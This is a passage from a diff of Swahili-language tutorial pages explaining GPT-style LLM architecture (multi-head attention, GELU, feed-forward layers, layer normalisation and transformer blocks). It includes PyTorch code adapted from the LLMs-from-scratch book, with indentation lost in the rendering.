			
		||||
 | 
			
		||||
Inaweza kuwa inawezekana kutumia tena kanuni ya awali na kuongeza tu kifuniko kinachokizindua mara kadhaa, lakini hii ni toleo lililoimarishwa zaidi kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) linaloshughulikia vichwa vyote kwa wakati mmoja (kupunguza idadi ya mizunguko ya gharama kubwa). Kama unavyoona katika kanuni, vipimo vya kila token vinagawanywa katika vipimo tofauti kulingana na idadi ya vichwa. Kwa njia hii, ikiwa token ina vipimo 8 na tunataka kutumia vichwa 3, vipimo vitagawanywa katika arrays 2 za vipimo 4 na kila kichwa kitatumia moja yao:
 | 
			
		||||
```python
 | 
			
		||||
class MultiHeadAttention(nn.Module):
 | 
			
		||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
assert (d_out % num_heads == 0), \
 | 
			
		||||
"d_out must be divisible by num_heads"
 | 
			
		||||
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.num_heads = num_heads
 | 
			
		||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 | 
			
		||||
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer(
 | 
			
		||||
"mask",
 | 
			
		||||
torch.triu(torch.ones(context_length, context_length),
 | 
			
		||||
diagonal=1)
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
# b is the num of batches
 | 
			
		||||
# num_tokens is the number of tokens per batch
 | 
			
		||||
# d_in is the dimensions er token
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
# We implicitly split the matrix by adding a `num_heads` dimension
 | 
			
		||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
 | 
			
		||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
 | 
			
		||||
keys = keys.transpose(1, 2)
 | 
			
		||||
queries = queries.transpose(1, 2)
 | 
			
		||||
values = values.transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
 | 
			
		||||
attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 | 
			
		||||
 | 
			
		||||
# Original mask truncated to the number of tokens and converted to boolean
 | 
			
		||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 | 
			
		||||
 | 
			
		||||
# Use the mask to fill attention scores
 | 
			
		||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
 | 
			
		||||
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
# Shape: (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
context_vec = (attn_weights @ values).transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
 | 
			
		||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
 | 
			
		||||
context_vec = self.out_proj(context_vec) # optional projection
 | 
			
		||||
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
 | 
			
		||||
batch_size, context_length, d_in = batch.shape
 | 
			
		||||
d_out = 2
 | 
			
		||||
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)
 | 
			
		||||
 | 
			
		||||
context_vecs = mha(batch)
 | 
			
		||||
 | 
			
		||||
print(context_vecs)
 | 
			
		||||
print("context_vecs.shape:", context_vecs.shape)
 | 
			
		||||
 | 
			
		||||
```
 | 
			
		||||
Kwa utekelezaji mwingine wa kompakt na mzuri unaweza kutumia [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) darasa katika PyTorch.
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Jibu fupi la ChatGPT kuhusu kwa nini ni bora kugawanya vipimo vya tokens kati ya vichwa badala ya kuwa na kila kichwa kinachunguza vipimo vyote vya tokens zote:
 | 
			
		||||
>
 | 
			
		||||
> Ingawa kuruhusu kila kichwa kushughulikia vipimo vyote vya embedding kunaweza kuonekana kuwa na faida kwa sababu kila kichwa kitakuwa na ufikiaji wa taarifa kamili, mazoea ya kawaida ni **kugawanya vipimo vya embedding kati ya vichwa**. Njia hii inalinganisha ufanisi wa kompyuta na utendaji wa mfano na inahimiza kila kichwa kujifunza uwakilishi tofauti. Hivyo basi, kugawanya vipimo vya embedding kwa ujumla kunapewa kipaumbele kuliko kuwa na kila kichwa kinachunguza vipimo vyote.
 | 
			
		||||
 | 
			
		||||
## References
 | 
			
		||||
 | 
			
		||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
 | 
			
		||||
@ -1,666 +0,0 @@
 | 
			
		||||
# 5. LLM Architecture
 | 
			
		||||
 | 
			
		||||
## LLM Architecture
 | 
			
		||||
 | 
			
		||||
> [!TIP]
 | 
			
		||||
> Lengo la hatua hii ya tano ni rahisi sana: **Kuunda usanifu wa LLM kamili**. Panga kila kitu pamoja, tumia tabaka zote na uunde kazi zote za kuzalisha maandiko au kubadilisha maandiko kuwa IDs na kinyume chake.
 | 
			
		||||
>
 | 
			
		||||
> Usanifu huu utatumika kwa mafunzo na kutabiri maandiko baada ya kufundishwa.
 | 
			
		||||
 | 
			
		||||
Mfano wa usanifu wa LLM kutoka [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 | 
			
		||||
 | 
			
		||||
Mwakilishi wa kiwango cha juu unaweza kuonekana katika:
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
1. **Input (Tokenized Text)**: Mchakato huanza na maandiko yaliyotolewa token, ambayo yanabadilishwa kuwa uwakilishi wa nambari.
 | 
			
		||||
2. **Token Embedding and Positional Embedding Layer**: Maandiko yaliyotolewa token yanapita kupitia **token embedding** layer na **positional embedding layer**, ambayo inashika nafasi ya tokens katika mfuatano, muhimu kwa kuelewa mpangilio wa maneno.
 | 
			
		||||
3. **Transformer Blocks**: Mfano una **12 transformer blocks**, kila moja ikiwa na tabaka nyingi. Blocks hizi hurudia mfuatano ufuatao:
 | 
			
		||||
- **Masked Multi-Head Attention**: Inaruhusu mfano kuzingatia sehemu tofauti za maandiko ya ingizo kwa wakati mmoja.
 | 
			
		||||
- **Layer Normalization**: Hatua ya kawaida ili kuimarisha na kuboresha mafunzo.
 | 
			
		||||
- **Feed Forward Layer**: Inawajibika kwa kuchakata habari kutoka kwa tabaka la umakini na kufanya utabiri kuhusu token inayofuata.
 | 
			
		||||
- **Dropout Layers**: Tabaka hizi zinazuia overfitting kwa kuacha vitengo kwa bahati nasibu wakati wa mafunzo.
 | 
			
		||||
4. **Final Output Layer**: Mfano unatoa **4x50,257-dimensional tensor**, ambapo **50,257** inawakilisha ukubwa wa msamiati. Kila safu katika tensor hii inahusiana na vector ambayo mfano hutumia kutabiri neno linalofuata katika mfuatano.
 | 
			
		||||
5. **Goal**: Lengo ni kuchukua embeddings hizi na kuzibadilisha tena kuwa maandiko. Kwa haswa, safu ya mwisho ya pato inatumika kuzalisha neno linalofuata, linalowakilishwa kama "forward" katika mchoro huu.
 | 
			
		||||
 | 
			
		||||
### Code representation
 | 
			
		||||
```python
 | 
			
		||||
import torch
 | 
			
		||||
import torch.nn as nn
 | 
			
		||||
import tiktoken
 | 
			
		||||
 | 
			
		||||
class GELU(nn.Module):
 | 
			
		||||
def __init__(self):
 | 
			
		||||
super().__init__()
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return 0.5 * x * (1 + torch.tanh(
 | 
			
		||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 | 
			
		||||
(x + 0.044715 * torch.pow(x, 3))
 | 
			
		||||
))
 | 
			
		||||
 | 
			
		||||
class FeedForward(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.layers = nn.Sequential(
 | 
			
		||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
 | 
			
		||||
GELU(),
 | 
			
		||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return self.layers(x)
 | 
			
		||||
 | 
			
		||||
class MultiHeadAttention(nn.Module):
 | 
			
		||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
 | 
			
		||||
super().__init__()
 | 
			
		||||
assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
 | 
			
		||||
 | 
			
		||||
self.d_out = d_out
 | 
			
		||||
self.num_heads = num_heads
 | 
			
		||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
 | 
			
		||||
 | 
			
		||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
 | 
			
		||||
self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
 | 
			
		||||
self.dropout = nn.Dropout(dropout)
 | 
			
		||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
b, num_tokens, d_in = x.shape
 | 
			
		||||
 | 
			
		||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
 | 
			
		||||
queries = self.W_query(x)
 | 
			
		||||
values = self.W_value(x)
 | 
			
		||||
 | 
			
		||||
# We implicitly split the matrix by adding a `num_heads` dimension
 | 
			
		||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
 | 
			
		||||
 | 
			
		||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
 | 
			
		||||
keys = keys.transpose(1, 2)
 | 
			
		||||
queries = queries.transpose(1, 2)
 | 
			
		||||
values = values.transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
 | 
			
		||||
attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
 | 
			
		||||
 | 
			
		||||
# Original mask truncated to the number of tokens and converted to boolean
 | 
			
		||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
 | 
			
		||||
 | 
			
		||||
# Use the mask to fill attention scores
 | 
			
		||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
 | 
			
		||||
 | 
			
		||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
 | 
			
		||||
attn_weights = self.dropout(attn_weights)
 | 
			
		||||
 | 
			
		||||
# Shape: (b, num_tokens, num_heads, head_dim)
 | 
			
		||||
context_vec = (attn_weights @ values).transpose(1, 2)
 | 
			
		||||
 | 
			
		||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
 | 
			
		||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
 | 
			
		||||
context_vec = self.out_proj(context_vec) # optional projection
 | 
			
		||||
 | 
			
		||||
return context_vec
 | 
			
		||||
 | 
			
		||||
class LayerNorm(nn.Module):
 | 
			
		||||
def __init__(self, emb_dim):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.eps = 1e-5
 | 
			
		||||
self.scale = nn.Parameter(torch.ones(emb_dim))
 | 
			
		||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
mean = x.mean(dim=-1, keepdim=True)
 | 
			
		||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
 | 
			
		||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
 | 
			
		||||
return self.scale * norm_x + self.shift
 | 
			
		||||
 | 
			
		||||
class TransformerBlock(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.att = MultiHeadAttention(
 | 
			
		||||
d_in=cfg["emb_dim"],
 | 
			
		||||
d_out=cfg["emb_dim"],
 | 
			
		||||
context_length=cfg["context_length"],
 | 
			
		||||
num_heads=cfg["n_heads"],
 | 
			
		||||
dropout=cfg["drop_rate"],
 | 
			
		||||
qkv_bias=cfg["qkv_bias"])
 | 
			
		||||
self.ff = FeedForward(cfg)
 | 
			
		||||
self.norm1 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.norm2 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# Shortcut connection for attention block
 | 
			
		||||
shortcut = x
 | 
			
		||||
x = self.norm1(x)
 | 
			
		||||
x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
x = self.drop_shortcut(x)
 | 
			
		||||
x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for feed forward block
 | 
			
		||||
shortcut = x
 | 
			
		||||
x = self.norm2(x)
 | 
			
		||||
x = self.ff(x)
 | 
			
		||||
x = self.drop_shortcut(x)
 | 
			
		||||
x = x + shortcut  # Add the original input back
 | 
			
		||||
 | 
			
		||||
return x
 | 
			
		||||
 | 
			
		||||
 | 
			
		||||
class GPTModel(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
 | 
			
		||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
 | 
			
		||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
self.trf_blocks = nn.Sequential(
 | 
			
		||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
 | 
			
		||||
 | 
			
		||||
self.final_norm = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.out_head = nn.Linear(
 | 
			
		||||
cfg["emb_dim"], cfg["vocab_size"], bias=False
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, in_idx):
 | 
			
		||||
batch_size, seq_len = in_idx.shape
 | 
			
		||||
tok_embeds = self.tok_emb(in_idx)
 | 
			
		||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
 | 
			
		||||
x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
 | 
			
		||||
x = self.drop_emb(x)
 | 
			
		||||
x = self.trf_blocks(x)
 | 
			
		||||
x = self.final_norm(x)
 | 
			
		||||
logits = self.out_head(x)
 | 
			
		||||
return logits
 | 
			
		||||
 | 
			
		||||
GPT_CONFIG_124M = {
 | 
			
		||||
"vocab_size": 50257,    # Vocabulary size
 | 
			
		||||
"context_length": 1024, # Context length
 | 
			
		||||
"emb_dim": 768,         # Embedding dimension
 | 
			
		||||
"n_heads": 12,          # Number of attention heads
 | 
			
		||||
"n_layers": 12,         # Number of layers
 | 
			
		||||
"drop_rate": 0.1,       # Dropout rate
 | 
			
		||||
"qkv_bias": False       # Query-Key-Value bias
 | 
			
		||||
}
 | 
			
		||||
 | 
			
		||||
torch.manual_seed(123)
 | 
			
		||||
model = GPTModel(GPT_CONFIG_124M)
 | 
			
		||||
out = model(batch)
 | 
			
		||||
print("Input batch:\n", batch)
 | 
			
		||||
print("\nOutput shape:", out.shape)
 | 
			
		||||
print(out)
 | 
			
		||||
```
 | 
			
		||||
### **Kazi ya Kuamsha ya GELU**
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class GELU(nn.Module):
 | 
			
		||||
def __init__(self):
 | 
			
		||||
super().__init__()
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
return 0.5 * x * (1 + torch.tanh(
 | 
			
		||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 | 
			
		||||
(x + 0.044715 * torch.pow(x, 3))
 | 
			
		||||
))
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **GELU (Gaussian Error Linear Unit):** Kazi ya kuamsha inayoongeza kutokuwa na mstari katika mfano.
 | 
			
		||||
- **Kuamsha kwa Ufanisi:** Tofauti na ReLU, ambayo inafuta maingizo hasi, GELU inachora kwa laini maingizo kuwa matokeo, ikiruhusu thamani ndogo, zisizo sifuri kwa maingizo hasi.
 | 
			
		||||
- **Mwelekeo wa Kihesabu:**
 | 
			
		||||
 | 
			
		||||
<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo la matumizi ya kazi hii baada ya tabaka za mstari ndani ya tabaka la FeedForward ni kubadilisha data za mstari kuwa zisizo za mstari ili kuruhusu mfano kujifunza uhusiano tata, zisizo za mstari.
 | 
			
		||||
 | 
			
		||||
### **Mtandao wa Neva wa FeedForward**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maoni ili kuelewa vyema mifano ya matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class FeedForward(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.layers = nn.Sequential(
 | 
			
		||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
 | 
			
		||||
GELU(),
 | 
			
		||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
 | 
			
		||||
)
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
 | 
			
		||||
x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
 | 
			
		||||
x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
return x  # Output shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Mtandao wa FeedForward Kulingana na Nafasi:** Inatumia mtandao wa viwango viwili uliounganishwa kikamilifu kwa kila nafasi tofauti na kwa njia sawa.
 | 
			
		||||
- **Maelezo ya Kiwango:**
 | 
			
		||||
- **Kiwango cha Kwanza cha Mstari:** Kinapanua ukubwa kutoka `emb_dim` hadi `4 * emb_dim`.
 | 
			
		||||
- **Kazi ya GELU:** Inatumia kutokuwa na mstari.
 | 
			
		||||
- **Kiwango cha Pili cha Mstari:** Kinapunguza ukubwa kurudi kwenye `emb_dim`.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Kama unavyoona, mtandao wa Feed Forward unatumia viwango 3. Kiwango cha kwanza ni kiwango cha mstari ambacho kitazidisha ukubwa kwa 4 kwa kutumia uzito wa mstari (vigezo vya kufundisha ndani ya mfano). Kisha, kazi ya GELU inatumika katika ukubwa wote ili kuleta mabadiliko yasiyo ya mstari ili kupata uwakilishi mzuri na hatimaye kiwango kingine cha mstari kinatumika kurudi kwenye ukubwa wa awali wa ukubwa.
 | 
			
		||||
 | 
			
		||||
### **Mekaniki ya Umakini wa Vichwa Vingi**
 | 
			
		||||
 | 
			
		||||
Hii tayari imeelezwa katika sehemu ya awali.
 | 
			
		||||
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Umakini wa Kujitenga wa Vichwa Vingi:** Inaruhusu mfano kuzingatia nafasi tofauti ndani ya mlolongo wa ingizo wakati wa kuandika token.
 | 
			
		||||
- **Vipengele Muhimu:**
 | 
			
		||||
- **Maswali, Funguo, Thamani:** Mipango ya mstari ya ingizo, inayotumika kuhesabu alama za umakini.
 | 
			
		||||
- **Vichwa:** Mekaniki nyingi za umakini zinazoendesha kwa sambamba (`num_heads`), kila moja ikiwa na ukubwa mdogo (`head_dim`).
 | 
			
		||||
- **Alama za Umakini:** Zinahesabiwa kama bidhaa ya dot ya maswali na funguo, zimepimwa na kufichwa.
 | 
			
		||||
- **Kuficha:** Mask ya sababu inatumika kuzuia mfano kuzingatia token za baadaye (muhimu kwa mifano ya autoregressive kama GPT).
 | 
			
		||||
- **Uzito wa Umakini:** Softmax ya alama za umakini zilizofichwa na kupimwa.
 | 
			
		||||
- **Vector ya Muktadha:** Jumla yenye uzito ya thamani, kulingana na uzito wa umakini.
 | 
			
		||||
- **Mipango ya Matokeo:** Kiwango cha mstari cha kuunganisha matokeo ya vichwa vyote.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo la mtandao huu ni kupata uhusiano kati ya token katika muktadha sawa. Aidha, token zimegawanywa katika vichwa tofauti ili kuzuia overfitting ingawa uhusiano wa mwisho uliofanywa kwa kila kichwa unachanganywa mwishoni mwa mtandao huu.
 | 
			
		||||
>
 | 
			
		||||
> Aidha, wakati wa mafunzo **mask ya sababu** inatumika ili token za baadaye zisihesabiwe wakati wa kutafuta uhusiano maalum kwa token na **dropout** pia inatumika ili **kuzuia overfitting**.
 | 
			
		||||
 | 
			
		||||
### **Kiwango** Kurekebisha
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class LayerNorm(nn.Module):
 | 
			
		||||
def __init__(self, emb_dim):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.eps = 1e-5 # Prevent division by zero during normalization.
 | 
			
		||||
self.scale = nn.Parameter(torch.ones(emb_dim))
 | 
			
		||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
mean = x.mean(dim=-1, keepdim=True)
 | 
			
		||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
 | 
			
		||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
 | 
			
		||||
return self.scale * norm_x + self.shift
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Layer Normalization:** Mbinu inayotumika kurekebisha ingizo kati ya vipengele (embedding dimensions) kwa kila mfano binafsi katika kundi.
 | 
			
		||||
- **Vipengele:**
 | 
			
		||||
- **`eps`:** Kiwango kidogo (`1e-5`) kinachoongezwa kwenye variance ili kuzuia kugawanya kwa sifuri wakati wa normalization.
 | 
			
		||||
- **`scale` na `shift`:** Vigezo vinavyoweza kujifunza (`nn.Parameter`) vinavyomruhusu modeli kupima na kuhamasisha matokeo yaliyorekebishwa. Vimeanzishwa kuwa moja na sifuri, mtawalia.
 | 
			
		||||
- **Mchakato wa Kurekebisha:**
 | 
			
		||||
- **Hesabu Mean (`mean`):** Hesabu mean ya ingizo `x` kati ya dimension ya embedding (`dim=-1`), ikihifadhi dimension kwa ajili ya broadcasting (`keepdim=True`).
 | 
			
		||||
- **Hesabu Variance (`var`):** Hesabu variance ya `x` kati ya dimension ya embedding, pia ikihifadhi dimension. Kigezo cha `unbiased=False` kinahakikisha kuwa variance inahesabiwa kwa kutumia mhesabu wa biased (kugawanya kwa `N` badala ya `N-1`), ambacho ni sahihi wakati wa kurekebisha juu ya vipengele badala ya sampuli.
 | 
			
		||||
- **Normalize (`norm_x`):** Inapunguza mean kutoka `x` na kugawanya kwa mzizi wa variance pamoja na `eps`.
 | 
			
		||||
- **Scale na Shift:** Inatumia vigezo vinavyoweza kujifunza `scale` na `shift` kwa matokeo yaliyorekebishwa.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo ni kuhakikisha mean ya 0 na variance ya 1 kati ya dimensions zote za token sawa. Lengo hili ni **kuimarisha mafunzo ya mitandao ya neva ya kina** kwa kupunguza mabadiliko ya ndani ya covariate, ambayo inahusisha mabadiliko katika usambazaji wa uhamasishaji wa mtandao kutokana na kubadilisha vigezo wakati wa mafunzo.
 | 
			
		||||
 | 
			
		||||
### **Transformer Block**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maoni ili kuelewa vyema sura za matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
 | 
			
		||||
class TransformerBlock(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.att = MultiHeadAttention(
 | 
			
		||||
d_in=cfg["emb_dim"],
 | 
			
		||||
d_out=cfg["emb_dim"],
 | 
			
		||||
context_length=cfg["context_length"],
 | 
			
		||||
num_heads=cfg["n_heads"],
 | 
			
		||||
dropout=cfg["drop_rate"],
 | 
			
		||||
qkv_bias=cfg["qkv_bias"]
 | 
			
		||||
)
 | 
			
		||||
self.ff = FeedForward(cfg)
 | 
			
		||||
self.norm1 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.norm2 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for attention block
 | 
			
		||||
shortcut = x  # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.norm1(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.att(x)    # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for feedforward block
 | 
			
		||||
shortcut = x       # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.norm2(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.ff(x)     # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
return x  # Output shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Muundo wa Tabaka:** Inachanganya umakini wa vichwa vingi, mtandao wa feedforward, urekebishaji wa tabaka, na muunganisho wa ziada.
 | 
			
		||||
- **Urekebishaji wa Tabaka:** Unatumika kabla ya tabaka za umakini na feedforward kwa mafunzo thabiti.
 | 
			
		||||
- **Muunganisho wa Ziada (Njia Fupi):** Ongeza ingizo la tabaka kwa matokeo yake ili kuboresha mtiririko wa gradient na kuwezesha mafunzo ya mitandao yenye kina.
 | 
			
		||||
- **Dropout:** Unatumika baada ya tabaka za umakini na feedforward kwa ajili ya urekebishaji.
 | 
			
		||||
 | 
			
		||||
#### **Ufanisi wa Hatua kwa Hatua**
 | 
			
		||||
 | 
			
		||||
1. **Njia ya Kwanza ya Ziada (Umakini wa Kibinafsi):**
 | 
			
		||||
- **Ingizo (`shortcut`):** Hifadhi ingizo la awali kwa muunganisho wa ziada.
 | 
			
		||||
